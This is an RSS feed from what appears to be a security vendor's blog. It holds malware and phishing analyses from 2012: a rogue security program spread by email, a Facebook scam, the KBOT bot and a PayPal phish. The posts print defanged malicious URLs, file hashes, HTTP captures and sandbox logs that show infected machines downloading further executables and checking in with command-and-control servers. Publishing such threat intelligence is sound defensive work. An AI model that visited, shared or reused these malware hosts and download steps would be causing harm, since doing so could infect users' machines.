<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NoBirusThanks Blog</title>
	<atom:link href="http://blog.novirusthanks.org/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.novirusthanks.org</link>
	<description>Just another WordPress site</description>
	<lastBuildDate>Mon, 15 Apr 2013 15:56:14 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
		<item>
		<title>Rogue security software XP Total Security spreads by email</title>
		<link>http://blog.novirusthanks.org/2012/12/alert-unread-message-rogue-security-software-xp-total-security/</link>
		<comments>http://blog.novirusthanks.org/2012/12/alert-unread-message-rogue-security-software-xp-total-security/#comments</comments>
		<pubDate>Fri, 21 Dec 2012 15:12:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[42DD7BD51C37B15965E67357517BFCBF]]></category>
		<category><![CDATA[datingcool2012]]></category>
		<category><![CDATA[rogue security software]]></category>
		<category><![CDATA[statav2013]]></category>
		<category><![CDATA[xp total security]]></category>
		<category><![CDATA[xptotalsecurity]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3290</guid>
		<description><![CDATA[<p>We have received an email that states we have an unread message and someone has sent us a private message. But it does not state if the unread message is from a social network, it only says it comes from SecureMessage.System, as you can see from this image: The body of the email is this: [...]</p><p>The post <a href="http://blog.novirusthanks.org/2012/12/alert-unread-message-rogue-security-software-xp-total-security/">Rogue security software XP Total Security spreads by email</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>We have received an email that states we have an unread message and someone has sent us a private message. But it does not state if the unread message is from a social network, it only says it comes from SecureMessage.System, as you can see from this image:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/12/xp-total-security-email.png" alt="Message Header" /></p>
<p>The body of the email is this:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/12/xp-total-security-email-body.png" alt="Email Body" /></p>
<p>Inside the body of the email there are 4 links in total that are clickable and we have extracted 3 different malicious and very dangerous URLs that are all active, as of the time of writing this message, and all of them point to a remote file named link.php:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// datingcool2012 . asia/ link.php
hxxp:// site-dating2010 . info/ link.php
hxxp:// datingbest2011 . asia/ link.php</pre></td></tr></table></div>

<p>We have analyzed the activity of one URL and we can clearly see that the malicious URL leads to a web page that tries to scare the user by displaying an alert window stating the PC is infected by trojans and spyware, a well known method used to spread rogue security software:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/12/xptotalsecurity-alertwindow.png" alt="XP Total Security Alert Window" /></p>
<p>When the button &#8220;Clean computer&#8221; is clicked, we are prompted to download a file:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/12/xptotalsecurity-downloadfile.png" alt="Download XP Total Security File" /></p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">File: freescan_seven_2013_exe
Size: 274624 bytes
MD5 Hash: 42DD7BD51C37B15965E67357517BFCBF
SHA1 Hash: 8D2D541CD4E3C7D0E9246940AA21DF84DAC06C49
SHA256 Hash: 7D6918FAA12EA588D6F7838267C60C6F8A3F51D5AC27A894D472F74E8B037CFB
SHA384 Hash: B7EEDBEF30B55276EAB875CABE5BFE33AD7A3B3DE1D772EF78B06651FA906362EACD6845DD2BAC3C5C7C2BD8E541C1EA
SHA512 Hash: EAEA7C1623F27BA75D11A6A2F1174DCF10B89461A5185C95E5E66FBD9A6400218247E8262DC6F3D96D88ED46A1877A657AB84444EEFA3B5608B9BE9E08569366</pre></td></tr></table></div>

<p>When the file is executed, it installs the rogue security software <strong>XP Total Security</strong>:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/12/xptotalsecurity-maingui.png" alt="XP Total Security GUI" /></p>
<p>This is the network traffic generated by the malicious web page:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">GET /link.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: datingcool2012 . asia
&nbsp;
GET /?affid=00110&amp;promo_type=5&amp;promo_opt=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: datingcool2012 . asia
&nbsp;
GET /images/alert.png HTTP/1.1
Referer: hxxp:// datingcool2012 . asia/?affid=00110&amp;promo_type=5&amp;promo_opt=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: datingcool2012 . asia
Cookie: PHPSESSID=umr4543d59rfa2lmq2fhbnue07
&nbsp;
GET /index/two/ HTTP/1.1
Referer: hxxp:// datingcool2012 . asia /?affid=00110&amp;promo_type=5&amp;promo_opt=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: datingcool2012 . asia
Cookie: PHPSESSID=umr4543d59rfa2lmq2fhbnue07</pre></td></tr></table></div>

<p>This is the data logged by the sandbox after the malicious file has been executed:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Process Created - C:\WINDOWS\explorer.exe - %Desktop%\freescan_2013.exe - Unknown Publisher - A413A21AF671DD1DA45E3CFA81515D11 - 274624 bytes
File Modified - %Desktop%\freescan_2013.exe - %LocalAppData%\epi.exe
Process Created - %Desktop%\freescan_2013.exe - %LocalAppData%\epi.exe - Unknown Publisher - 0F5AB3B66E5F14CDDBA31B7258DDB168 - 274624 bytes
File Created - %Desktop%\freescan_2013.exe - %LocalAppData%\epi.exe - 0F5AB3B66E5F14CDDBA31B7258DDB168 - 274624 bytes - attr: [-hidden] - PE
File Deleted - %LocalAppData%\epi.exe - %Desktop%\freescan_2013.exe - 274624 bytes
Write Registry - %LocalAppData%\epi.exe - \REGISTRY\USER\S-1-5-21-1177236615-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - ctfmon.exe - C:\WINDOWS\system32\ctfmon.exe
Connection Established - %LocalAppData%\epi.exe - TCP - 212.48.8.140 - 80
Connection Established - %LocalAppData%\epi.exe - UDP - 192.168.119.2 - 53
Web Request - %LocalAppData%\epi.exe - GET - statav2013 .com - /a6a7ccfae1135dbe00110050d44623
Web Request - %LocalAppData%\epi.exe - GET - statav2013 .com - /a6a7ccfae1135dbe00110050d4462a
Connection Established - %LocalAppData%\epi.exe - TCP - 127.0.0.1 - 1116
Web Request - %LocalAppData%\epi.exe - GET - statav2013 .com - /a6a7ccfae1135dbe00110050d4462f
Connection Established - %LocalAppData%\epi.exe - TCP - 127.0.0.1 - 80
Web Request - %LocalAppData%\epi.exe - GET - statav2013 .com - /a6a7ccfae1135dbe00110050d44635</pre></td></tr></table></div>

<p>New malicious URL logged:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// statav2013 . com / a6a7ccfae1135dbe00110050d44635</pre></td></tr></table></div>

<p>This is the malicious executable file installed by the rogue software:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/12/xptotalsecurity-executable.png" alt="XP Total Security Executable File" /></p>
<p>Links to the scan reports generated by URLVoid:</p>
<p><a href="http://www.urlvoid.com/scan/datingcool2012.asia/">http://www.urlvoid.com/scan/datingcool2012.asia/</a><br />
<a href="http://www.urlvoid.com/scan/site-dating2010.info/">http://www.urlvoid.com/scan/site-dating2010.info/</a><br />
<a href="http://www.urlvoid.com/scan/datingbest2011.asia/">http://www.urlvoid.com/scan/datingbest2011.asia/</a><br />
<a href="http://www.urlvoid.com/scan/mailstorybig.info/">http://www.urlvoid.com/scan/mailstorybig.info/</a><br />
<a href="http://www.urlvoid.com/scan/statav2013.com/">http://www.urlvoid.com/scan/statav2013.com/</a></p>
<p>Other scan reports related malicious URLs of XP Total Security:</p>
<p><a href="http://www.urlvoid.com/scan/pyxes.asia/">http://www.urlvoid.com/scan/pyxes.asia/</a><br />
<a href="http://www.urlvoid.com/scan/terlies.asia/">http://www.urlvoid.com/scan/terlies.asia/</a><br />
<a href="http://www.urlvoid.com/scan/purveying.asia/">http://www.urlvoid.com/scan/purveying.asia/</a></p>
<p>The post <a href="http://blog.novirusthanks.org/2012/12/alert-unread-message-rogue-security-software-xp-total-security/">Rogue security software XP Total Security spreads by email</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/12/alert-unread-message-rogue-security-software-xp-total-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Scam: Account suspicious activity &#8211; Facebook.Team</title>
		<link>http://blog.novirusthanks.org/2012/12/scam-account-suspicious-activity-facebook-team/</link>
		<comments>http://blog.novirusthanks.org/2012/12/scam-account-suspicious-activity-facebook-team/#comments</comments>
		<pubDate>Thu, 20 Dec 2012 11:50:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security News]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[facebook.team scam]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3282</guid>
		<description><![CDATA[<p>We started to receive emails that state our Facebook account has been blocked due to suspicious activity and to activate it we should click on a URL. Clearly this is a scam, the email seems to be sent by an email account from China, see the image below: This is an image of the body [...]</p><p>The post <a href="http://blog.novirusthanks.org/2012/12/scam-account-suspicious-activity-facebook-team/">Scam: Account suspicious activity &#8211; Facebook.Team</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>We started to receive emails that state our Facebook account has been blocked due to suspicious activity and to activate it we should click on a URL. Clearly this is a scam, the email seems to be sent by an email account from China, see the image below:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/12/fbscam1.png" alt="Email" /></p>
<p>This is an image of the body message:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/12/fbscam.png" alt="Facebook Scam Email" /></p>
<p>A quick note is that there is no Facebook logo, the email has been sent to an email address that was found in the WHOIS data of a domain name that has not yet a website, it is supposed to not have a Facebook account yet.</p>
<p>The URL redirects to an external malicious URL that is clearly not facebook.com:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// cooldating2013 .info/link.php</pre></td></tr></table></div>

<p>View the <a href="http://www.urlvoid.com/scan/cooldating2013.info/">scan report from URLVoid</a>.</p>
<p>The post <a href="http://blog.novirusthanks.org/2012/12/scam-account-suspicious-activity-facebook-team/">Scam: Account suspicious activity &#8211; Facebook.Team</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/12/scam-account-suspicious-activity-facebook-team/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>KBOT C&amp;C Malware</title>
		<link>http://blog.novirusthanks.org/2012/11/kbot-cc-malware/</link>
		<comments>http://blog.novirusthanks.org/2012/11/kbot-cc-malware/#comments</comments>
		<pubDate>Tue, 27 Nov 2012 02:10:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[gate.php]]></category>
		<category><![CDATA[kbot]]></category>
		<category><![CDATA[ns224291-ovh-net]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3272</guid>
		<description><![CDATA[<p>We just logged a new C&#038;C bot named KBOT: Content of the /js/ folder: Content of the /images/ folder: Content of the /css/ folder: Malware activity (cb119a6b42da7bba1b6151f2e0bd6f1e): File Created - %SAMPLE% - %Temp%\epbUex.UxO - A7A21220689BD796F6B74E5D983D810E - 2560 bytes - attr: [] - PE Connection Established - C:\WINDOWS\system32\svchost.exe - UDP - 65.55.21.21 - 123 Process Created [...]</p><p>The post <a href="http://blog.novirusthanks.org/2012/11/kbot-cc-malware/">KBOT C&#038;C Malware</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>We just logged a new C&#038;C bot named <strong>KBOT</strong>:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/11/kbot1.png" alt="KBOT Contorl Panel" /></p>
<p>Content of the /js/ folder:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/11/kbot-js.png" alt="KBOT JS Path" /></p>
<p>Content of the /images/ folder:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/11/kbot-images.png" alt="KBOT Images Path" /></p>
<p>Content of the /css/ folder:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/11/kbot-css.png" alt="KBOT CSS Path" /></p>
<p>Malware activity (cb119a6b42da7bba1b6151f2e0bd6f1e):</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">File Created - %SAMPLE% - %Temp%\epbUex.UxO - A7A21220689BD796F6B74E5D983D810E - 2560 bytes - attr: [] - PE
Connection Established - C:\WINDOWS\system32\svchost.exe - UDP - 65.55.21.21 - 123
Process Created - %SAMPLE% - %SAMPLE% - malboxsofts - CB119A6B42DA7BBA1B6151F2E0BD6F1E - 536064 bytes
File Created - %SAMPLE% - %Temp%\EYEbMADiaiRT - NOTHING TO HASH - 0 bytes - attr: [-hidden] - -
File Created - %SAMPLE% - %Temp%\data1.dmp - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %SAMPLE% - %Temp%\data2.dmp - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %SAMPLE% - %Temp%\data.dmp - C10DBECA73F8835240E08E4511284B83 - 54 bytes - attr: [] - -
Connection Established - %SAMPLE% - TCP - 91.234.106.251 - 80
Web Request - %SAMPLE% - GET - wedontforget. ogspy. net - /poo/index.php?action=add&amp;username=admin&amp;password=0p0p0-0p0p0-0p0p0-0p0p0-0p0p0&amp;app=Windows%20XP%20x86&amp;pcname=%PCNAME%&amp;sitename=Microsoft</pre></td></tr></table></div>

<p>Dangerous URLs:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp://wedontforget.ogspy. net</pre></td></tr></table></div>

<p>Malware activity (91b13d987937c800f33458f17f320651):</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Process Created - %SAMPLE% - %SAMPLE% - FileZilla Project - 91B13D987937C800F33458F17F320651 - 387584 bytes
File Modified - %SAMPLE% - %UserProfile%\crss.exe
Write Registry - %SAMPLE% - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Profile Manager2 - %UserProfile%\crss.exe
Write Registry - %SAMPLE% - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Document Explorer2 - %UserProfile%\Documents\crss.exe
Write Registry - %SAMPLE% - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Download Manager2 - %UserProfile%\Downloads\crss.exe
Process Created - %SAMPLE% - %UserProfile%\crss.exe - FileZilla Project - 91B13D987937C800F33458F17F320651 - 387584 bytes
Process Created - %UserProfile%\crss.exe - %UserProfile%\crss.exe - FileZilla Project - 91B13D987937C800F33458F17F320651 - 387584 bytes
Write Registry - %UserProfile%\crss.exe - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Profile Manager2 - %UserProfile%\crss.exe
Write Registry - %UserProfile%\crss.exe - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Document Explorer2 - %UserProfile%\Documents\crss.exe
Write Registry - %UserProfile%\crss.exe - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Download Manager2 - %UserProfile%\Downloads\crss.exe
Connection Established - %UserProfile%\crss.exe - TCP - 8.23.224.90 - 80
Web Request - %UserProfile%\crss.exe - GET - purebot2. sytes.net - /
Connection Established - %UserProfile%\crss.exe - TCP - 46.105.116.182 - 80
Web Request - %UserProfile%\crss.exe - GET - ns224291. ovh.net - /pt/gate.php
Connection Established - %UserProfile%\crss.exe - TCP - 127.0.0.1 - 1044
Connection Established - %UserProfile%\crss.exe - TCP - 68.168.119.237 - 80
Web Request - %UserProfile%\crss.exe - GET - aqwadorient .com - /xs/minchrxxx.exe</pre></td></tr></table></div>

<p>Dangerous URLs:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp://purebot2. sytes.net
hxxp://aqwadorient. com/xs/minchrxxx.exe
hxxp://68.168.119.237:80
hxxp://ns224291.ovh. net/pt/gate.php</pre></td></tr></table></div>

<p>Malware activity (3c08ae8e84c87b4f5f916d3ac9f6fa07):</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">File Modified - %SAMPLE% - %AppData%\LOCALS~1\Temp\aut2.tmp
File Deleted - %SAMPLE% - %Temp%\aut2.tmp - 3206 bytes
Process Created - %SAMPLE% - %SAMPLE% - Unknown Publisher - 3C08AE8E84C87B4F5F916D3AC9F6FA07 - 375599 bytes
File Modified - %SAMPLE% - %UserProfile%\explorer.exe
File Created - %SAMPLE% - %AppData%\LOCALS~1\Temp\aut2.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %SAMPLE% - %AppData%\LOCALS~1\Temp\hiuhtra - NOTHING TO HASH - 0 bytes - attr: [] - -
Write Registry - %SAMPLE% - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Profile Manager - %UserProfile%\explorer.exe
Write Registry - %SAMPLE% - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Document Explorer - %UserProfile%\Documents\explorer.exe
Write Registry - %SAMPLE% - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Download Manager - %UserProfile%\Downloads\explorer.exe
Process Created - %SAMPLE% - %UserProfile%\explorer.exe - Unknown Publisher - 3C08AE8E84C87B4F5F916D3AC9F6FA07 - 375599 bytes
File Modified - %UserProfile%\explorer.exe - %AppData%\LOCALS~1\Temp\aut3.tmp
File Deleted - %UserProfile%\explorer.exe - %Temp%\aut3.tmp - 3206 bytes
Process Created - %UserProfile%\explorer.exe - %UserProfile%\explorer.exe - Unknown Publisher - 3C08AE8E84C87B4F5F916D3AC9F6FA07 - 375599 bytes
Write Registry - %UserProfile%\explorer.exe - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Profile Manager - %UserProfile%\explorer.exe
Write Registry - %UserProfile%\explorer.exe - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Document Explorer - %UserProfile%\Documents\explorer.exe
Write Registry - %UserProfile%\explorer.exe - \REGISTRY\USER\S-1-5-21-1177238915-1770027372-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Run - Download Manager - %UserProfile%\Downloads\explorer.exe
File Created - %UserProfile%\explorer.exe - %AppData%\LOCALS~1\Temp\aut3.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %UserProfile%\explorer.exe - %AppData%\LOCALS~1\Temp\qlmdfvx - NOTHING TO HASH - 0 bytes - attr: [] - -
Connection Established - %UserProfile%\explorer.exe - TCP - 8.23.224.90 - 80
Web Request - %UserProfile%\explorer.exe - GET - h4r3.hopto.org - /
Connection Established - %UserProfile%\explorer.exe - TCP - 46.105.116.182 - 80
Web Request - %UserProfile%\explorer.exe - GET - ns224291.ovh.net - /pt/gate.php
Connection Established - %UserProfile%\explorer.exe - TCP - 127.0.0.1 - 1054
Connection Established - %UserProfile%\explorer.exe - TCP - 213.186.33.87 - 80
Web Request - %UserProfile%\explorer.exe - GET - ovatec.fr - /xs/spyxxxxx.exe
File Modified - %UserProfile%\explorer.exe - %InternetCache%\Content.IE5\8YPELNXD\spyxxxxx[1].exe
File Created - %UserProfile%\explorer.exe - %UserProfile%\Cookies\%UserName%\@ovatec[1].txt - 576B13CB892DA082AEB395D43E910654 - 76 bytes - attr: [] - -
File Created - %UserProfile%\explorer.exe - %InternetCache%\Content.IE5\8YPELNXD\spyxxxxx[1].exe - E6854368B0BE650F336147351EB23C1E - 81920 bytes - attr: [] - -
File Modified - %UserProfile%\explorer.exe - %AppData%\LOCALS~1\Temp\88518.exe</pre></td></tr></table></div>

<p>Dangerous URLs:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp://h4r3.hopto. org
hxxp://ns224291.ovh. net/pt/gate.php
hxxp://ovatec. fr/xs/spyxxxxx.exe</pre></td></tr></table></div>

<p>Other malware URLs (PE):</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/11/ppi-malware.png" alt="Malware PE URLs" /></p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp://ovatec. fr/xs/11.exe
hxxp://ovatec. fr/xs/an26.exe
hxxp://ovatec. fr/xs/lock26.exe
hxxp://ovatec. fr/xs/min26.exe
hxxp://ovatec. fr/xs/ppi.exe
hxxp://ovatec. fr/xs/spy.exe</pre></td></tr></table></div>

<p>File <strong>11.exe</strong>:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Size: 86016 bytes
MD5: 753E06472FF07E7620498F828E726A54
SHA1: 6EF12A9AC49ACA2BF8814CE5385FA4215395F59E
SHA256: E596583DBC0D0190DABE5965AB8C234C274089F620BA027829E6B556C2372E81
SHA384: 53B4BD628C874B7FF183A5785B45F52E246A66D91B5F2A5BB77A1D459710F9CE94E80D7EEF13C3CDFFC8209FFC619485
SHA512: 6C8EE2663D5D555B33FF34FF925AB1891C8A5C210879CDF49606117374B4A18D33D317B86C69E30C8E9B877F2DA5A1296EAB20D4B11A7596D6CFA45014DB8789</pre></td></tr></table></div>

<p>File <strong>an26.exe</strong>:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Size: 52224 bytes
MD5: D21E13CCA5BDCBB506B19118B95BFF44
SHA1: 5C8B462A7FCF4E89DAF59231F8300F13E59EE623
SHA256: BBBA88E36D374C1F431C346F006A637FAC18B491E6F12ABB609F20C2F6BCF47B
SHA384: 88058E8D833D106730D67ED3ADBC85B557216C697AB576C791C0B5BF150BB83943743BB036439702F605B5111AE78D98
SHA512: F1B95657201FE15573A6D015018E4C76F76C61F4DF780073BBF1D3BBBDE4DE596093EDFFB89A6E4942E8ABF8B399EA74BEFB936D6F4AF5E29535F5083E420B78</pre></td></tr></table></div>

<p>File <strong>lock26.exe</strong>:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Size: 77824 bytes
MD5: BE33C2C5856136E496DC1F3155533DC7
SHA1: A6CF2F278BA2F09C8BDCD6527B362267D580940C
SHA256: A488C36048A6C0F3DC0EAB6069C3C73632438BFFF902AE2722B74984ABBB7B62
SHA384: 2ECEF8AB69E06F7759A8176F68E0BE970F84D632858A6D725319A9D18448436B06C62F8178A7AF70595F87B4419C8F43
SHA512: 18CA870E0D84327916956CAC2F8B4E6763B16AC618D9C5C807075C309033DD06A52A42FF81F7AFB08DB8D6865C618331CB7013EDFE0DC0E738688D98E81775A2</pre></td></tr></table></div>

<p>File <strong>min26.exe</strong>:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Size: 81920 bytes
MD5: 145D31147D440DC42380E90C9A3375DA
SHA1: B3B30BEC507ED43F39B8A62A238CEE792BE8EEA2
SHA256: 2CA6DF7E6796D99353E8407AB5DB936250E9C446B9EB55FFE246C76C93ABFED9
SHA384: 6D9D33F6B02F500CF5B08A1DDEDE7FAF38695B4B981EE3AB89E6BDB1A8ED04297BAF05A55221945BA10808FEA573789C
SHA512: D6A3751AF18E6F85B7BED47AD2389225CD4123C1C7F99A5BF5D754E5ADC82CCA40586943DC926E6219789FFB55AF888ACA88C43E583938C545842351C67314E0</pre></td></tr></table></div>

<p>File <strong>ppi.exe</strong>:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Size: 73728 bytes
MD5: 03E5C843E2BD8339DB31ED4F8A407C1D
SHA1: 2C2F39EDE684BA2CA02597E6D9B182BBD1997DE4
SHA256: 37C30E45F4D946CBF1952EBB1D7B4D1CEA83380975849128EF729960329519A8
SHA384: 1C3CC5B1C9BB117993161EF2B1B3567C6F4B22AF91B3F99DCC911D9576366C4802E92A31C1C71710CF991925B6B4CBBB
SHA512: F869B63CE3F7781C13B6BFC70666D0BAF8F0E21AA3AD7A06C0EB4EF9061D64AEB1571B0BF3B28DED2E32B66E1E1495FAA497D8EA18E8E616D9FF92D07485E1B7</pre></td></tr></table></div>

<p>File <strong>spy.exe</strong>:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Size: 487424 bytes
MD5: 3CD58F4D27F42AEFF79C7813FF772CF9
SHA1: AFE10513E0A62AB8F327FA6963711F53AAB6DC70
SHA256: 642CF5AD05472AD2729C9C06EE7AA0CCB4E5D3E5B37A804E62CCBCCAEC902B63
SHA384: 5A73576A689C2C8F31A7E95D1916F95BA7590B7358563EC37210AC99D482A8F7F5F558C8C42FCD8AD19171D096896A93
SHA512: D6475A2BD4FFEF2A33C4DED910C76C5163E86EC45D024EA7ECA9C1A615F90AEBDC6FB2013E44AFBE39029E1DBD355B7AFF996314B86EC60224BCEE03DA42DF76</pre></td></tr></table></div>

<p>The post <a href="http://blog.novirusthanks.org/2012/11/kbot-cc-malware/">KBOT C&#038;C Malware</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/11/kbot-cc-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Phishing: Compromised Account (PayPal)</title>
		<link>http://blog.novirusthanks.org/2012/02/phishing-compromised-account-paypal/</link>
		<comments>http://blog.novirusthanks.org/2012/02/phishing-compromised-account-paypal/#comments</comments>
		<pubDate>Thu, 23 Feb 2012 11:11:46 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[compromised account paypal]]></category>
		<category><![CDATA[paypal]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=3211</guid>
		<description><![CDATA[<p>We received another suspicious email that spreads a phishing URL: The A HREF link redirects to the phishing URL: hxxp:// restore.account.sysadmin-center .com/paypal/restore/webscrcmd=_login-run/webscrcmd=_account-run/confirm-paypal/restore=_paypal-account/updates-paypal/ Email header details: Received: from main.pensativo.nl (main.benefiet.eu [141.138.139.44]) Received: from [202.175.132.8] (helo=administrator) by main.pensativo.nl with esmtpa (Exim 4.77) From: &#34;Paypal Department&#34; Subject: Compromised Account Date: Thu, 23 Feb 2012 15:55:40 +1300 To: undisclosed-recipients:;</p><p>The post <a href="http://blog.novirusthanks.org/2012/02/phishing-compromised-account-paypal/">Phishing: Compromised Account (PayPal)</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></description>
				<content:encoded><![CDATA[<p>We received another suspicious email that spreads a phishing URL:</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/2012/02/23_02_2012-11_17_28.jpeg" alt="Phishing Email" /></p>
<p>The A HREF link redirects to the phishing URL:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">hxxp:// restore.account.sysadmin-center .com/paypal/restore/webscrcmd=_login-run/webscrcmd=_account-run/confirm-paypal/restore=_paypal-account/updates-paypal/</pre></td></tr></table></div>

<p>Email header details:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Received: from main.pensativo.nl (main.benefiet.eu [141.138.139.44])
Received: from [202.175.132.8] (helo=administrator) by main.pensativo.nl with esmtpa (Exim 4.77)
From: &quot;Paypal Department&quot;
Subject: Compromised Account
Date: Thu, 23 Feb 2012 15:55:40 +1300
To: undisclosed-recipients:;</pre></td></tr></table></div>

<p>The post <a href="http://blog.novirusthanks.org/2012/02/phishing-compromised-account-paypal/">Phishing: Compromised Account (PayPal)</a> appeared first on <a href="http://blog.novirusthanks.org">NoBirusThanks Blog</a>.</p>]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2012/02/phishing-compromised-account-paypal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Phishing: Skype Incident Updating Your Information To the new security</title>
